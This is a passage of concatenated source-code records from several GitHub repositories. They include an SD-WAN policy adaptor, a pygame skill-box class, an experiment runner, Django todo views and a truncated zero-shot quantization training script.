return temp\n\n def post_service_endpoint(self, ipAddress, portNumber, profileName):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key in self.srv_endpoints.keys():\n msg = \"Ignoring request: the endpoint\" + key + \" is already defined\"\n logger.warning( err.ElementAlreadyDefined(\"post_service_endpoint\", msg))\n error['status'] = 400\n error['title'] = 'ENDPOINT ALREADY DEFINED'\n error['description'] = 'The endpoint IP: ' + ipAddress + ' and port ' + portNumber + ' is already defined. Ignoring this event.'\n return True, error\n \n defined, profile_type = self.is_traffic_profile_defined(profileName)\n if not defined:\n logger.warning(err.CannotFindElement('post_service_endpoint', \\\n 'Traffic profile ' + profileName + ' is not defined, ignoring request.'))\n error['status'] = 400\n error['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error\n \n \n try:\n\n if profile_type == 'AppRoute':\n \n policy_name = self.app_route_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined:\n raise err.CannotFindElement('post_service_endpoint', policy_name)\n \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_approute_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n\n elif profile_type == 'Data':\n \n policy_name = self.data_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined: \n raise err.CannotFindElement('post_service_endpoint', policy_name) \n \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_data_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n \n except err.CannotFindElement as e:\n logger.warning('Ignoring request: Cannot find a policy called %s', e.elem)\n \n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Details: %s', e)\n\n return False, error\n\n def delete_service_endpoint(self, ipAddress, portNumber):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key not in self.srv_endpoints.keys():\n logger.warning(err.CannotFindElement(\"delete_service_endpoint\", \"This endpoint is not defined, ignoring request.\"))\n error['status'] = 400\n error['title'] = 'ENDPOINT NOT FOUND'\n error['description'] = 'Cannot process DELETE event: resource IP ' + ipAddress + ' and port ' + portNumber + ' does not exist. Ignoring this event.'\n return True, error\n \n traffic_profile = self.srv_endpoints[key]['trafficProfileName']\n policy_id = self.srv_endpoints[key]['policyId']\n\n try:\n \n if traffic_profile in self.app_route_traffic_profiles.keys():\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n elif traffic_profile in self.data_traffic_profiles.keys(): \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n else:\n\n logger.warning(err.CannotFindElement('delete_service_endpoint', \\\n 'Traffic profile ' + traffic_profile + ' is not defined, ignoring request.'))\n\n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Exception name: %s', repr(e))\n logger.error('Details: %s', e)\n \n return False, error\n \n\n\n def put_service_endpoint(self, ipAddress, portNumber, profileName):\n error_data = {}\n \n #Check if the profile is defined \n profile_defined, profile_type = self.is_traffic_profile_defined(profileName)\n \n if not profile_defined: \n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n \"The traffic profile \" + profileName + \" is not defined, ignoring this request\"))\n error_data['status'] = 400\n error_data['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error_data['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error_data\n \n #Check if the policy is defined\n if profile_type == 'AppRoute':\n policyName = self.app_route_traffic_profiles[profileName]['policyName']\n\n else:\n policyName = self.data_traffic_profiles[profileName]['policyName']\n\n policy_defined, _ = self.is_policy_defined(policyName, profile_type)\n \n if not policy_defined:\n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n 'Ignoring request: Cannot find a policy called '+ policyName ))\n return False, error_data\n \n # Do the actual work\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n return error, error_data\n else:\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n return error, error_data\n \n \n\n\n def create_data_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n \n # Collect all endpoint + tunnel info for each profile\n cnwan_seqs = []\n \n \n for name, data in self.data_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'Data')\n if defined: \n\n previous_cnwan_remove.append(data['policyName']) \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_data_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_data_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove)\n logger.debug(\"New merge policy is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_data_policy(policy_id, policy, 'create_data_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_data_policy_with_all_endpoints')\n \n def create_approute_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n # Collect all endpoint + sla info for each profile\n cnwan_seqs = []\n \n for name, data in self.app_route_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'AppRoute')\n if defined: \n \n previous_cnwan_remove.append(data['policyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_approute_policy_with_all_endpoints, ignoring metadata value %s because \\\n policy %s does not exist in the SD-WAN controller.', name, data['policyName'])\n \n # Rertrieve and update merge policy\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(self.credentials['sdwanMergedPolicyName'])\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n policy['sequences'] = templates.add_cnwan_sequences_to_merge_policy(policy['sequences'], cnwan_seqs, previous_cnwan_remove) \n logger.debug(\"New merge policy for AppRoute is %s\", pprint.pformat(policy['sequences']))\n response = self.api_endpoint.put_approute_policy(policy_id, policy, 'create_approute_policy_with_all_endpoints')\n \n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'create_approute_policy_with_all_endpoints')\n \n def is_traffic_profile_defined(self, profileName):\n if profileName in self.app_route_traffic_profiles.keys():\n return True, 'AppRoute'\n elif profileName in self.data_traffic_profiles.keys():\n return True, 'Data'\n else:\n return False, None\n\n\n\n### POLICY MANAGEMENT\n \n def is_policy_defined(self, policyName, policyType):\n if policyType == 'AppRoute':\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policyName)\n \n elif policyType == 'Data':\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policyName)\n \n else: \n return False, None\n \n \n if policy_id is None:\n return False, None\n else:\n return True, policy_id\n \n def is_policy_in_mappings(self, policyName, policyType):\n \n if policyType == 'AppRoute':\n for name, data in self.app_route_traffic_profiles.items(): \n if data['policyName'] == policyName:\n return True, name\n \n elif policyType == 'Data':\n for name, data in self.data_traffic_profiles.items():\n if data['policyName'] == policyName:\n return True, name\n \n return False, None\n \n \n def empty_approute_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_approute_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n def add_endpoint_array_approute_policy(self, policy_id, endpoints, call_origin): \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_approute_policy(endpoints, policy)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, call_origin)\n \n \n \n def empty_data_policy(self, policy_name, call_origin):\n policy_id = self.api_endpoint.get_data_policy_id_by_name(policy_name)\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.create_empty_policy(policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n \n \n \n def add_endpoint_array_data_policy(self, policy_id, endpoints, call_origin):\n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_array_endpoints_to_data_policy(endpoints, policy)\n response = self.api_endpoint.put_data_policy(policy_id, payload, call_origin)\n\n \n \n\n### EXPOSED API FUNCITONS\n\n def get_mappings(self):\n\n temp = []\n for name, data in self.app_route_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"AppRoute\",\n \"policyName\" : data['policyName']\n }\n temp.append(profile)\n\n for name, data in self.data_traffic_profiles.items():\n profile = {\n \"metadataKey\" : str(self.metadata_keys),\n \"metadataValue\": name,\n \"policyType\": \"Data\",\n \"policyName\" : data['policyName']\n\n }\n temp.append(profile)\n\n return temp\n\n def post_mapping(self, mapping):\n\n if mapping[\"metadataKey\"] not in self.metadata_keys:\n self.metadata_keys.append(mapping[\"metadataKey\"])\n logger.info('Detected new metadata key %s, adding to list.', mapping[\"metadataKey\"])\n \n \n name = mapping['metadataValue']\n profile_type = mapping['policyType']\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(mapping['policyName'], profile_type)\n\n if name in self.app_route_traffic_profiles.keys() or \\\n name in self.data_traffic_profiles.keys():\n \n msg = 'Ignoring request: the traffic profile ' + name + ' is already defined '\n logger.warning(err.ElementAlreadyDefined(\"post_traffic_profile\", msg))\n\n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + mapping['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n \n if profile_type == 'AppRoute':\n self.app_route_traffic_profiles[name] = {\n 'policyName': mapping['policyName']\n }\n \n elif profile_type == 'Data':\n self.data_traffic_profiles[name] = {\n 'policyName' : mapping['policyName']\n }\n \n else:\n logger.warning('Ignoring request: unknow traffic policy type.')\n logger.warning(err.UnsupportedPolicyType(profile_type, ['AppRoute', 'Data']))\n\n\n \n\n def delete_mapping(self, profile_name):\n self.check_config()\n self.test_connection()\n \n if profile_name in self.app_route_traffic_profiles.keys(): \n \n #Delete endpoints from the policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'AppRoute')\n if policy_defined:\n\n self.empty_approute_policy(policy_name,'delete_mapping')\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints()\n \n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n \n # Delete traffic profile from internal variable\n del self.app_route_traffic_profiles[profile_name]\n \n\n elif profile_name in self.data_traffic_profiles.keys():\n \n #Delete endpoints from the policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n policy_defined, _ = self.is_policy_defined(policy_name, 'Data')\n if policy_defined:\n \n self.empty_data_policy(policy_name, 'delete_traffic_profile')\n #No active policies affected because these profiles are never active\n\n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints()\n \n # Delete associated endpoints from internal variable\n self.delete_service_endpoint_by_profile(profile_name)\n\n \n # Delete traffic profile from internal variable\n del self.data_traffic_profiles[profile_name]\n \n else:\n logger.warning(err.CannotFindElement(\"delete_traffic_profile\",\\\n \"This traffic profile does not exist, ignoring request.\"))\n\n\n def put_mapping(self, profile_name, data):\n self.check_config()\n self.test_connection()\n \n \n profile_defined, profile_type = self.is_traffic_profile_defined(profile_name)\n # Verify new policiy is defined\n policy_defined, new_policy_id = self.is_policy_defined(data['policyName'], data['policyType'])\n #Verify policy NOT in use in other mappings\n policy_defined_in_mapping, mapping_name = self.is_policy_in_mappings(data['policyName'], data['policyType'])\n \n if not profile_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"This traffic profile does not exist, ignoring request.\"))\n \n \n elif not policy_defined:\n logger.warning(err.CannotFindElement(\"put_traffic_profile\", \\\n \"The policy \" + str(data['policyName']) +\" does not exist in the sdwan controller, ignoring request.\"))\n \n \n elif policy_defined_in_mapping:\n \n msg = 'Ignoring request: the policy ' + data['policyName'] + ' is already defined in the mapping ' + mapping_name\n logger.warning(msg)\n raise err.DuplicatePolicy(msg)\n \n else:\n #List affected endpoints \n endpoints = self.get_service_endpoints_by_profile(profile_name)\n \n if profile_type == 'AppRoute':\n #Empty old policy\n policy_name = self.app_route_traffic_profiles[profile_name]['policyName']\n self.empty_approute_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'AppRoute':\n # AppRoute to AppRoute\n #Add enpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Update internal var\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n else:\n # AppRoute to Data\n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n\n \n #Change type of profile\n old_policy = [ self.app_route_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name] = {\n 'policyName' : data['policyName']\n } \n del self.app_route_traffic_profiles[profile_name]\n\n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints(old_policy)\n \n elif profile_type == 'Data':\n #Empty old policy\n policy_name = self.data_traffic_profiles[profile_name]['policyName']\n self.empty_data_policy(policy_name, 'put_traffic_profile')\n \n if data['policyType'] == 'Data':\n # Data to Data \n \n #Add endpoints to new policy\n self.add_endpoint_array_data_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n # Update internal var\n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.data_traffic_profiles[profile_name]['policyName'] = data['policyName']\n \n # Regenerate merge policy\n self.create_data_policy_with_all_endpoints(old_policy)\n\n \n else:\n # Data to AppRoute\n \n #Add endpoints to new policy\n self.add_endpoint_array_approute_policy(new_policy_id, endpoints, 'put_traffic_profile')\n \n #Change type of profile \n old_policy = [ self.data_traffic_profiles[profile_name]['policyName'] ]\n self.app_route_traffic_profiles[profile_name] = {\n 'policyName': data['policyName']\n }\n del self.data_traffic_profiles[profile_name]\n \n # Regenerate merge policies\n self.create_data_policy_with_all_endpoints(old_policy)\n self.create_approute_policy_with_all_endpoints()\n\n #Update internal endpoint variable\n for ep in endpoints:\n self.srv_endpoints[ep]['policyId'] = new_policy_id\n\n\n\n def extract_profile(self, service):\n if 'metadata' not in service:\n return None\n \n for elem in service['metadata']:\n if elem['key'] in self.metadata_keys:\n return elem['value']\n return None\n \n def get_md_key_not_defined(self, service):\n if 'metadata' not in service:\n return ['MISSING METADATA ARRAY']\n \n not_def = []\n for elem in service['metadata']:\n if elem['key'] not in self.metadata_keys:\n not_def.append(elem['key'])\n \n return not_def\n\n def events(self, updates):\n self.check_config()\n self.test_connection()\n error_events =[]\n \n for elem in updates:\n ipAddress = elem['service']['address']\n portNumber = str(elem['service']['port'])\n profileName = self.extract_profile(elem['service'])\n logger.debug('Processing %s event on endpoint %s:%s', elem['event'], ipAddress, portNumber)\n \n \n \n if elem['event'] == 'delete':\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif profileName is None:\n #Unknown metadata key \n error = {}\n error['status'] = 400\n error['resource'] = elem['service']['name']\n error['title'] = 'MISSING METADATA KEY'\n error['description'] = 'The metadata key ' + str(self.get_md_key_not_defined(elem['service'])) + ' is \\\n not currently defined in the adaptor. Ignoring this event.'\n error_events.append(error)\n \n elif elem['event'] == 'create':\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n \n elif elem['event'] == 'update':\n error, error_data = self.put_service_endpoint(ipAddress, portNumber, profileName)\n if error:\n error_data['resource'] = elem['service']['name']\n error_events.append(error_data)\n\n else:\n #Unknown operation\n error = {}\n error['status'] = 405\n error['resource'] = elem['service']['name']\n error['title'] = 'Unsupoorted eventy type'\n error['description'] = 'The event ' + elem['event'] + ' is not currently \\\n supported. Supported events: create, update and delete.'\n error_events.append(error)\n \n \n self.create_data_policy_with_all_endpoints()\n self.create_approute_policy_with_all_endpoints() \n \n if len(error_events) != 0:\n logger.warning('The following elements were ingored: %s', error_events)\n raise err.PartialEventsError(error_events)\n\n","repo_name":"CloudNativeSDWAN/cnwan-adaptor","sub_path":"adaptor_library/metadata_adaptor/core_lib.py","file_name":"core_lib.py","file_ext":"py","file_size_in_byte":31295,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"33399990847","text":"from GameEntity import GameEntity\nimport random\n\n\nclass SkillBox(GameEntity):\n\n POSSIB_SKILLS = {\n 1: 'TELEPORT_UP',\n 2: 'BIG_JUMP',\n 3: 'GHOST_MODE'\n }\n\n def __init__(self, x_game_init, y_game_init):\n super(SkillBox, self).__init__()\n super(SkillBox, self).setXY(x_game_init, y_game_init)\n\n taille = len(SkillBox.POSSIB_SKILLS)\n diceroll = random.randint(1, taille)\n self.skill_id = diceroll\n self.skillname = SkillBox.POSSIB_SKILLS[diceroll]\n self.visible = True\n\n def updatePosition(self):\n # descente progressive des bonus skill\n x_ent, y_ent = self.getXY()\n self.setXY(x_ent, y_ent - 0.4)\n\n # def markToDisplay(self, surface):\n # x_ent,y_ent = self.getXY()\n # pygame.draw.rect( surface, pygame.Color('BROWN'),\n # pygame.Rect( x_ent,y_ent, 30,30) )\n","repo_name":"wkta/esc_segfault","sub_path":"SkillBox.py","file_name":"SkillBox.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32406692316","text":"import tensorflow as tf\nimport src.api as api\nimport argparse\nimport os\n\nfrom src.controllers.ui_controller import UIController\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', required=True, help='Config filepath.')\n parser.add_argument('-n', '--name', required=False, help='Name of the experiment. If none provided, name with a timestamp will be assigned.')\n parser.add_argument('-w', '--warnings', required=False, default=False, action='store_true', help='Display tensorflow warning.')\n args = parser.parse_args()\n verify_args(args)\n set_logging(args)\n return args\n\ndef verify_args(args):\n assert os.path.exists(args.config), 'Config filepath is not valid.'\n assert type(args.name) == str, 'Experiment name must be a string.'\n\ndef set_logging(args):\n if args.warnings == False:\n print(' - Hiding tensorflow output messages.')\n tf.get_logger().setLevel('ERROR')\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\ndef get_user_input(ui_controller):\n ui_controller.print_parameters('model')\n ui_controller.ask_parameters()\n ui_controller.print_parameters('training')\n ui_controller.print_parameters('validation')\n ui_controller.print_parameters('testing')\n ui_controller.ask_parameters()\n ui_controller.ask_retrain()\n ui_controller.ask_retest()\n return ui_controller\n\ndef main(config_path, experiment_name):\n config = api.get_config(config_path)\n api.setup_experiment(experiment_name, config)\n\n ui_controller = UIController(config, experiment_name)\n ui_controller = get_user_input(ui_controller)\n\n if ui_controller.skip_training == False:\n api.train(config, experiment_name, ui_controller.new_training)\n \n if ui_controller.skip_testing == False:\n api.test(config, experiment_name, ui_controller.new_testing)\n api.evaluate(experiment_name)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args.config, args.name)\n print(' - Script has finished successfully.')","repo_name":"MicrobialDarkMatter/Fishnchips_basecaller","sub_path":"run_fishnchips.py","file_name":"run_fishnchips.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70019090087","text":"from django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\n\n# Create your views here.\nfrom todos_list_demo.todos.forms import CreateTodoForm\nfrom todos_list_demo.todos.models import Todo\n\n\ndef list_todos(request):\n todos = Todo.objects.all()\n\n context = {\n 'todos': todos,\n }\n\n\n return render(request, 'todos/list_todos.html', context)\n\n\ndef my_profile(request, pk):\n user = User.objects.get(pk=pk)\n\n context = {\n 'user': user\n }\n\n return render(request, 'my_profile.html', context)\n\n\ndef index(request):\n return redirect('list todos')\n\n\ndef create_todo(request):\n if request.method == 'POST':\n form = CreateTodoForm(request.POST)\n\n if form.is_valid():\n form.save()\n redirect('list todos')\n\n else:\n form = CreateTodoForm()\n\n context = {\n 'form': form,\n }\n\n return render(request, 'todos/create_todo.html', context)","repo_name":"kaloyan03/Softuni-Python","sub_path":"Python Web Framework/todos_list_demo/todos_list_demo/todos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71248938727","text":"from __future__ import print_function\nimport os, random\nimport copy\nimport numpy as np\nimport argparse\nimport torch\nimport torchvision\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport network\nfrom utils.visualizer import VisdomPlotter\nfrom utils.loss import *\nfrom dataloader import get_dataloader\nfrom quantization import quantize_model\n\n\nvp = VisdomPlotter('8097', env='ZAQ-main')\n\ndef train(args, p_model, q_model, generator, optimizer, epoch):\n p_model.eval()\n q_model.train()\n generator.train()\n optimizer_Q, optimizer_G = optimizer\n\n inter_loss = SCRM().to(args.device)\n\n for i in range(args.epoch_itrs):\n for k in range(5):\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_Q.zero_grad()\n fake = generator(z).detach()\n g_p, p_logit = p_model(fake, True)\n g_q, q_logit = q_model(fake, True)\n loss_Q = F.l1_loss(q_logit, p_logit.detach()) + args.alpha * inter_loss(g_q, g_p)\n \n loss_Q.backward()\n optimizer_Q.step()\n\n z = torch.randn((args.batch_size, args.nz, 1, 1)).to(args.device)\n optimizer_G.zero_grad()\n generator.train()\n fake = generator(z)\n g_p, p_logit = p_model(fake, True) \n g_q, q_logit = q_model(fake, True)\n\n loss_G = - F.l1_loss(q_logit, p_logit) - args.alpha * inter_loss(g_q, g_p) - args.beta * g_p[-1].abs().mean()\n\n loss_G.backward()\n optimizer_G.step()\n\n if i % args.log_interval == 0:\n print('Train Epoch: [{}] [{}/{} ({:.0f}%)]\\tG_Loss: {:.6f} Q_loss: {:.6f}'.format(\n epoch, i, args.epoch_itrs, 100*float(i)/float(args.epoch_itrs), loss_G.item(), loss_Q.item()))\n vp.add_scalar('Loss_Q', (epoch-1)*args.epoch_itrs+i, loss_Q.item())\n vp.add_scalar('Loss_G', (epoch-1)*args.epoch_itrs+i, loss_G.item())\n\ndef test(args, model, test_loader, epoch=0):\n model.eval()\n\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for i, (data, target) in enumerate(test_loader):\n data, target = data.to(args.device), target.to(args.device)\n\n output = model(data)\n test_loss += F.cross_entropy(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nEpoch [{}] Test set: Average loss: {:.4f}, Accuracy: {}/{} ({:.4f}%)\\n'.format(\n epoch, test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n acc = correct/len(test_loader.dataset)\n return acc\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='ZAQ CIFAR.')\n parser.add_argument('--num_classes', type=int, default=10)\n parser.add_argument('--batch_size', type=int, default=256, metavar='N',\n help='input batch size for training (default: 256)')\n parser.add_argument('--test_batch_size', type=int, default=256, metavar='N',\n help='input batch size for testing (default: 128)')\n \n parser.add_argument('--epochs', type=int, default=300, metavar='N',\n help='number of epochs to train (default: 500)')\n parser.add_argument('--epoch_itrs', type=int, default=60)\n parser.add_argument('--lr_Q', type=float, default=0.1, metavar='LR',\n help='learning rate (default: 0.1)')\n parser.add_argument('--lr_G', type=float, default=1e-3,\n help='learning rate (default: 0.001)')\n parser.add_argument('--data_root', type=str, required=True, default=None)\n\n parser.add_argument('--dataset', type=str, default='cifar10', choices=['cifar10', 'cifar100'],\n help='dataset name (default: cifar10)')\n parser.add_argument('--model', type=str, default='resnet18', \n choices=['mobilenetv2', 'vgg19', 'resnet18', 'resnet20', 'resnet50'],\n help='model name (default: resnet18)')\n parser.add_argument('--weight_decay', type=float, default=5e-4)\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='SGD momentum (default: 0.9)')\n parser.add_argument('--device', type=str, default='0',\n help='device for training')\n parser.add_argument('--seed', type=int, default=6786, metavar='S',\n help='random seed (default: 6786)')\n parser.add_argument('--ckpt', type=str, default='')\n parser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\n parser.add_argument('--nz', type=int, default=256)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--beta\", type=float, default=0.1)\n parser.add_argument(\"--gamma\", type=float, default=0.1)\n parser.add_argument('--test_only', action='store_true', default=False)\n parser.add_argument('--download', action='store_true', default=False)\n\n # quantization \n parser.add_argument('--weight_bit', type=int, default=6, help='bit-width for parameters')\n parser.add_argument('--activation_bit', type=int, default=8, help='bit-width for act')\n \n args = parser.parse_args()\n\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n np.random.seed(args.seed)\n random.seed(args.seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n \n os.environ['CUDA_VISIBLE_DEVICES'] = args.device\n args.device = torch.device('cuda' if torch.cuda.is_available() else \"cpu\")\n os.makedirs('checkpoint/q_model/', exist_ok=True)\n print(args)\n\n _, test_loader = get_dataloader(args)\n\n args.num_classes = 10 if args.dataset=='cifar10' else 100\n q_model = network.get_model(args)\n generator = network.gan.Generator(nz=args.nz, nc=3, img_size=32)\n \n q_model.load_state_dict(torch.load(args.ckpt))\n print(\"p_model restored from %s\"%(args.ckpt))\n\n # p_model = p_model.to(device)\n q_model = q_model.to(args.device)\n generator = generator.to(args.device)\n p_model = copy.deepcopy(q_model)\n\n # quantization\n q_model = quantize_model(q_model, args)\n quant_acc = test(args, q_model, test_loader, 0)\n print('Quat Acc=%0.4f \\n' % quant_acc)\n\n p_model.eval()\n\n optimizer_Q = optim.SGD(q_model.parameters(), lr=args.lr_Q, weight_decay=args.weight_decay, momentum=0.9)\n optimizer_G = optim.Adam(generator.parameters(), lr=args.lr_G)\n \n scheduler_Q = optim.lr_scheduler.MultiStepLR(optimizer_Q, [100, 200], args.gamma)\n scheduler_G = optim.lr_scheduler.MultiStepLR(optimizer_G, [100, 200], args.gamma)\n best_acc = 0\n if args.test_only:\n acc = test(args, q_model, test_loader, 0)\n return\n acc_list = []\n for epoch in range(1, args.epochs + 1):\n # Train\n train(args, p_model=p_model, q_model=q_model, generator=generator, optimizer=[optimizer_Q, optimizer_G], epoch=epoch)\n scheduler_Q.step()\n scheduler_G.step()\n # Test\n acc = test(args, q_model, test_loader, epoch)\n acc_list.append(acc)\n if acc>best_acc:\n best_acc = acc\n print('Saving a best checkpoint ...')\n torch.save(q_model.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit.pt\"%(args.dataset, args.model, args.weight_bit))\n torch.save(generator.state_dict(),\"checkpoint/q_model/ZAQ-%s-%s-%sbit-generator.pt\"%(args.dataset, args.model, args.weight_bit))\n vp.add_scalar('Acc', epoch, acc)\n print(\"Best Acc=%.6f\" % best_acc)\n\n import csv\n os.makedirs('log', exist_ok=True)\n with open('log/ZAQ-%s-%s-%sbit.csv'%(args.dataset, args.model, args.param_bits), 'a') as f:\n writer = csv.writer(f)\n 